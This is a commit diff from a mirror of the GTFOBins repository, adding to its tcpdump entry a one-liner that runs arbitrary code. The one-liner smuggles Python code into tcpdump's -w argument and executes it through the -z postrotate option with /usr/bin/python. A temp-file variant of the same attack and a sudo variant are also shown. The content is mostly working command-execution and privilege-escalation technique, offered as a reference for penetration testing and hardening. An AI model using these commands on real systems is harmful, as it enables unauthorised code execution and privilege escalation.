mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-24 13:59:17 +01:00
Update tcpdump (adding one-line with arbitrary command)
This commit is contained in:
parent
2afe22a27b
commit
387651d444
@ -5,12 +5,16 @@ description: |
|
||||
In recent distributions (e.g., Debian 10 and Ubuntu 18) AppArmor limits the `postrotate-command` to a small subset of predefined commands thus preventing the execution of the following.
|
||||
functions:
|
||||
command:
|
||||
- code: |
|
||||
- description: This requires several commands.
|
||||
code: |
|
||||
COMMAND='id'
|
||||
TF=$(mktemp)
|
||||
echo "$COMMAND" > $TF
|
||||
chmod +x $TF
|
||||
tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
|
||||
- descprition: One-liner to run arbitrary command leveraging python argument parser that does not require a space between the option -c and the value.
|
||||
code: |
|
||||
tcpdump -ln -i lo -w -c__import__\(\"os\"\).system\(\"id\"\) -W 1 -G 1 -z /usr/bin/python
|
||||
sudo:
|
||||
- code: |
|
||||
COMMAND='id'
|
||||
|
Loading…
Reference in New Issue
Block a user